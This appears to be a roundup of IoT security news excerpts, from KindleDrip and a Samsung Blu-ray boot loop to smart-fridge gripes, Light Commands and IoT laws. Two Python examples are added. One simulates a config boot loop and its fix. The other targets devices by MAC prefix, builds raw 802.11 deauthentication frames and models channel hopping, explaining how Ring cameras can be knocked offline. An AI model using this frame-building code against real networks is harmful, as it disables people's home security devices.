KindleDrip — From Your Kindle’s Email Address to Using Your Credit Card
Some time ago, we noticed at Realmode Labs that Amazon Kindle has an interesting feature called “Send to Kindle”. This feature allows Kindle users to send e-books to their device as email attachments. We immediately thought of the potential security concerns of this feature: what if we can send malicious e-books to unsuspecting users?
Here's why your Samsung Blu-ray player bricked itself: It downloaded an XML config file that broke the firmware
This file, when fetched and saved to the device’s flash storage and processed by the equipment, crashed the system software and forced a reboot. Upon reboot, the player parsed the XML file again from its flash storage, crashed and rebooted again. And so on, and so on, and so on. Crucially, the XML file would be parsed before a new one could be fetched from the internet, so once the bad configuration file was fetched and stored by these particular Samsung Blu-ray players in the field, they were bricked.
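The ordering in that excerpt is the whole bug: stored config is parsed before a fresh one can be fetched, and the fetched file is written to flash without being checked. Here is a small simulation of that boot loop next to a hardened loader, as an added example (not Samsung's firmware, whose config schema is not public; the `<config><region>` schema, the sample XML and the flash dictionary are all constructed for the example):

```python
import xml.etree.ElementTree as ET


class Bricked(Exception):
    """Raised when the simulated player never reaches a successful boot."""


def parse_config(text: str) -> dict:
    """Stand-in for the firmware's config parser. The real schema is not
    published; this one just requires <config><region>...</region></config>."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from None
    region = root.find("region")
    if root.tag != "config" or region is None or not region.text:
        raise ValueError("unexpected config schema")
    return {"region": region.text}


def boot_naive(flash: dict, fetch, max_boots: int = 5) -> int:
    """The ordering the article describes: parse whatever is in flash first,
    and only after a good boot fetch a new file, which is written straight to
    flash without being checked. Returns the boot on which the player came up."""
    for boot in range(1, max_boots + 1):
        try:
            parse_config(flash["config"])
        except ValueError:
            continue                      # crash -> reboot -> same file again
        flash["config"] = fetch()         # unvalidated write: the trap
        return boot
    raise Bricked("parser never survived startup")


def boot_hardened(flash: dict, fetch, max_boots: int = 5, max_failures: int = 2) -> int:
    """Two changes: (1) a fetched file is parsed before it is committed, so a
    bad one never lands in flash; (2) a boot counter persisted in flash rolls
    back to the last-known-good file once it passes max_failures, which covers
    the case where the validator itself is what crashes."""
    for boot in range(1, max_boots + 1):
        flash["boot_failures"] = flash.get("boot_failures", 0) + 1
        if flash["boot_failures"] > max_failures and flash.get("last_good"):
            flash["config"] = flash["last_good"]
        try:
            parse_config(flash["config"])
        except ValueError:
            continue                      # crash -> reboot, counter survives
        flash["boot_failures"] = 0
        flash["last_good"] = flash["config"]
        candidate = fetch()
        try:
            parse_config(candidate)
        except ValueError:
            return boot                   # reject the update, keep running
        flash["config"] = candidate       # commit only what parsed
        return boot
    raise Bricked("no usable config, even after rollback")


# Constructed sample files: one well-formed, one truncated mid-tag.
GOOD_XML = "<config><region>US</region></config>"
BAD_XML = "<config><regio"


def demo() -> dict:
    """Naive player eats the bad file and loops; hardened player survives it."""
    naive = {"config": GOOD_XML}
    boot_naive(naive, lambda: BAD_XML)       # boots fine, then stores BAD_XML
    try:
        boot_naive(naive, lambda: GOOD_XML)  # never gets as far as fetching
        naive_bricked = False
    except Bricked:
        naive_bricked = True

    hard = {"config": GOOD_XML}
    boot_hardened(hard, lambda: BAD_XML)     # rejects BAD_XML before commit
    return {"naive_bricked": naive_bricked, "hardened_config": hard["config"]}


if __name__ == "__main__":
    print(demo())
```

The boot counter has to live in the same persistent storage as the config, not in RAM, or it resets with every crash and the rollback never fires.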
Greetings and salutations internet person! Have you ever pissed off a customer so much they bought a domain and stood up a website to shit on your asinine and boneheaded business practices? GE just did.
I just wanted a tall, cold, refreshing glass of water at 3am only to be greeted by a fucking atomic countdown on my trusty cold water and ice dispensing pal.
Vulnerabilities! We’ve got vulnerabilities here! … See? Nobody cares.
Jurassic Park is often (mistakenly) left out of the hacker movie canon. It clearly demonstrated the risk of an insider attack on control systems (Velociraptor rampage, amongst other tragedies…) nearly a decade ahead of the Maroochy sewage incident, it’s the first film I know of with a digital troll (“ah, ah, ah, you didn’t say the magic word!”), and Samuel L. Jackson correctly assesses the possible consequence of a hard reset (namely, everyone dying), resulting in his legendary “Hold on to your butts”. The quotable mayhem is seeded early in the film, when biotech spy Lewis Dodgson gives a sack of money to InGen’s Dennis Nedry to steal some dino DNA. Dodgson’s caricatured OPSEC (complete with trilby and dark glasses) is mocked by Nedry shouting, “Dodgson! Dodgson! We’ve got Dodgson here! See, nobody cares…” Three decades later, this quote still comes to mind* whenever conventional wisdom doesn’t seem to square with observed reality, and today we’re going to apply it to the oft-maligned world of Industrial Control System (ICS) security.
People Are Jailbreaking Used Teslas to Get the Features They Expect
Last week, Jalopnik ran an article about a person who bought a used Tesla from a dealer—who in turn bought it at auction directly from Tesla under California’s lemon law buyback program—advertised as having Autopilot, the company’s Advanced Driver Assistance System. The entire Autopilot package, which the car had when the dealer bought it, costs an extra $8,000. Then, Tesla remotely removed the software because “Full-Self Driving was not a feature that you had paid for.” Tesla said if the customer wanted Autopilot back, he’d have to fork over the $8,000.
I broke Giant’s handheld scanner system by only buying two things
The employee interface verified that my cart contained two (2) items. She scanned both. It verified that those two items were ones I had scanned. And then it told her that she needed to scan five more items to complete the audit, because the audit requires seven items to be scanned.
Wifi deauthentication attacks and home security
So, the attack is to simply monitor the network for any devices that fall into the address range you want to target, and then immediately start shooting deauthentication frames at them once you see one. I hacked airodump-ng to ignore all clients that didn’t look like a Ring, and then pasted in code from aireplay-ng to send deauthentication packets once it saw one. The problem here is that wifi cards can only be tuned to one frequency at a time, so unless you know the channel your potential target is on, you need to keep jumping between frequencies while looking for a target - and that means a target can potentially shoot off a notification while you’re looking at other frequencies.
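The three pieces of that attack (filter captured frames by vendor MAC prefix, build deauthentication frames for the matching client, and the channel-hopping blind spot) in pure standard-library Python, as an added example rather than the author's airodump-ng/aireplay-ng patch. Nothing is transmitted: frames are byte strings, the "capture" is constructed, and the target OUI `0a:1b:2c` is invented (real vendor prefixes come from the IEEE registry).

```python
import struct

# The post filters for clients that "look like a Ring" by MAC prefix. This
# OUI (first three bytes of the MAC) is invented for the example.
TARGET_OUIS = {bytes.fromhex("0a1b2c")}

DEAUTH_REASON_CLASS3 = 7   # "Class 3 frame received from nonassociated STA"


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def station_and_bssid(frame: bytes):
    """Return (station MAC, BSSID) from a raw 802.11 data frame, or None.

    To-DS set: the station transmits (addr2) to the AP (addr1).
    From-DS set: the AP transmits (addr2) to the station (addr1).
    Management frames, WDS (both bits set) and short frames are ignored.
    """
    if len(frame) < 24:
        return None
    fc, flags = frame[0], frame[1]
    if (fc >> 2) & 0x3 != 2:           # type 2 = data
        return None
    to_ds, from_ds = flags & 0x1, (flags >> 1) & 0x1
    addr1, addr2 = frame[4:10], frame[10:16]
    if to_ds and not from_ds:
        return addr2, addr1
    if from_ds and not to_ds:
        return addr1, addr2
    return None


def is_target(station: bytes) -> bool:
    return station[:3] in TARGET_OUIS


def build_deauth(dst: bytes, src: bytes, bssid: bytes, seq: int = 0,
                 reason: int = DEAUTH_REASON_CLASS3) -> bytes:
    """Raw 802.11 deauthentication frame (management type 0, subtype 12), no radiotap."""
    frame_control = (12 << 4) | (0 << 2) | 0              # subtype, type, version -> 0xC0
    hdr = struct.pack("<BBH", frame_control, 0, 0x013A)   # FC, flags, duration
    hdr += dst + src + bssid                               # addr1, addr2, addr3
    hdr += struct.pack("<H", (seq & 0xFFF) << 4)           # sequence control
    return hdr + struct.pack("<H", reason)                 # fixed field: reason code


def deauth_burst(station: bytes, bssid: bytes, count: int = 5):
    """Both directions, as aireplay-ng sends them: AP->station and station->AP."""
    frames = []
    for seq in range(count):
        frames.append(build_deauth(station, bssid, bssid, seq))
        frames.append(build_deauth(bssid, station, bssid, seq))
    return frames


def data_frame(station: bytes, bssid: bytes, to_ds: bool = True) -> bytes:
    """Constructed data-frame header (no body) standing in for a captured frame."""
    flags = 0x01 if to_ds else 0x02
    addrs = bssid + station + bssid if to_ds else station + bssid + bssid
    return struct.pack("<BBH", 2 << 2, flags, 0) + addrs + struct.pack("<H", 0)


def sniff_with_hopping(airtime, hop_plan):
    """Simulate a single-channel card hopping through hop_plan, one channel per
    time slot. airtime is [(slot, channel, frame)]; a frame is seen only if the
    card is tuned to its channel in that slot. Returns the first matching client
    plus how many target transmissions went unseen meanwhile: that is the
    window in which a Ring can get its notification out."""
    missed = 0
    for slot, channel, frame in airtime:
        hit = station_and_bssid(frame)
        if not (hit and is_target(hit[0])):
            continue
        if channel != hop_plan[slot % len(hop_plan)]:
            missed += 1                # target talked while we were elsewhere
            continue
        return {"channel": channel, "station": hit[0], "bssid": hit[1],
                "missed": missed, "deauth": deauth_burst(hit[0], hit[1])}
    return {"channel": None, "missed": missed, "deauth": []}


# Constructed sample capture: an unrelated client on channel 1, then the target
# on channel 6 transmitting once while the card is on 11 and once while it is on 6.
AP = mac("aa:bb:cc:dd:ee:ff")
TARGET_STA = mac("0a:1b:2c:11:22:33")
OTHER_STA = mac("de:ad:be:ef:00:01")
SAMPLE_AIRTIME = [
    (0, 1, data_frame(OTHER_STA, AP)),
    (1, 6, data_frame(TARGET_STA, AP)),
    (2, 6, data_frame(TARGET_STA, AP, to_ds=False)),
]
HOP_PLAN = [1, 11, 6]

if __name__ == "__main__":
    result = sniff_with_hopping(SAMPLE_AIRTIME, HOP_PLAN)
    print(result["channel"], result["missed"], len(result["deauth"]))
```

The `missed` count is the point of the excerpt's last sentence: the attacker's card is off-channel for most of the hop cycle, so a target that transmits first wins. It is also why 802.11w (protected management frames) matters on the AP and client side: it makes an unauthenticated deauthentication like the one built here get dropped.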
Light Commands is a vulnerability of MEMS microphones that allows attackers to remotely inject inaudible and invisible commands into voice assistants, such as Google assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light.
In our paper we demonstrate this effect, successfully using light to inject malicious commands into several voice controlled devices such as smart speakers, tablets, and phones across large distances and through glass windows.
I tried to adjust the time on my alarm clock. I failed.
For some reason, my alarm clock requires that I install an app on my phone. And the app required me to create an account.
I’m going to repeat that: In order to set my alarm clock, I had to create an account with the clock manufacturer.
Samsung TVs should be regularly virus-checked, the company says
A how-to video on the Samsung Support USA Twitter account demonstrates the more than a dozen remote-control button presses required to access the sub-menu needed to activate the check. It suggested users should carry out the process “every few weeks” to “prevent malicious software attacks”.
eyeDisk. Hacking the unhackable. Again
So, a lot of complex SCSI commands were used to understand the controller side of the device, but obtaining the password/iris can be achieved by simply sniffing the USB traffic to get the password/hash in clear text. The software collects the password first, then validates the user-entered password BEFORE sending the unlock password. This is a very poor approach given the unhackable claims and fundamentally undermines the security of the device.
The company behind the $16,000 AI-powered laundry-folding robot has filed for bankruptcy
Backed by companies like Panasonic and Daiwa House, Laundroid had ambitious dreams to be the ultimate wardrobe organizer for the entire household. It had multiple cameras and robotic arms to scan a load of laundry, and used Wi-Fi to connect to a server that would analyze the clothing using AI to figure out the best way to fold it. A companion app was supposed to be able to track every piece of clothing that went through Laundroid, and categorize the clothes by household member. One load of laundry would take a couple hours to be folded, as each T-shirt took about five to ten minutes.
That’s how it was supposed to work in theory, anyway — when I tested it out at CES 2018 with my own T-shirt, the machine ate it up and Laundroid engineers had to work for about 15 minutes to pry it out. The explanation was that its cameras couldn’t recognize my black shirt, only the brightly colored demo shirts they’d prepared on hand.
IoT Security Bills Use Federal Spending as Leverage
The bill includes a number of separate provisions, but the one that stands to have the biggest potential effect on IoT security is the establishment of a set of standards for security in connected devices, standards that will be developed by the National Institute of Standards and Technology. The draft legislation doesn’t set out too many specifics for what those security standards would be, but dictates they will include four separate areas: secure development, identity management, patching, and configuration management. Under the language in the bill, vendors selling IoT devices to federal agencies will have to meet the NIST standards for those areas.
The Internet of Food
You know something you can’t get through the internet’s wires, at least not on its own? Food. We’ve been working on it for years, but no, we’re not at the point where we can deliver nourishment directly via the series of tubes. But food has always been something of a means to an end—a way of driving the internet forward, making it something people would actually like to use.
Plus tons of links.
We’ve performed the first announcement in this experiment yesterday, and, despite the announcement being compliant with BGP standards, FRR routers reset their sessions upon receiving it.
And then: https://mailman.nanog.org/pipermail/nanog/2019-January/099142.html
We have canceled this experiment permanently.
Everybody can relax. The internet is safe now.
CES 2019: A Show Report
On display this year was connectivity and integration for consumers based on about 10 years of incremental and sometimes hardly noticed baby steps. There are three big developments that are enabling the vast majority of scenarios on display at CES 2019:
Any screen/speaker can play any streaming media.
Any device can be turned on/off/controlled by voice.
Any device can have a radio and connect to any other device with a radio.
Fun times ahead.
Lots of pictures.
The curious case of the Raspberry Pi in the network closet
None of them knew anything about this so I asked my IT colleagues and they were as baffled as I was. I heard of people getting paid to put things like this in places they shouldn’t and for this reason I was very interested in finding out what it actually does.
The Internet of Unprofitable Things
Uncle Andrew wants to tell you a festive story. The NTPmare shortly after Christmas.
A look at home routers, and a surprising bug in Linux/MIPS
We reviewed 28 popular home routers for basic hardening features. None performed well. Oh, and we found a bug in the Linux/MIPS architecture.
California's bad IoT law
It’s based on the misconception of adding security features. It’s like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against.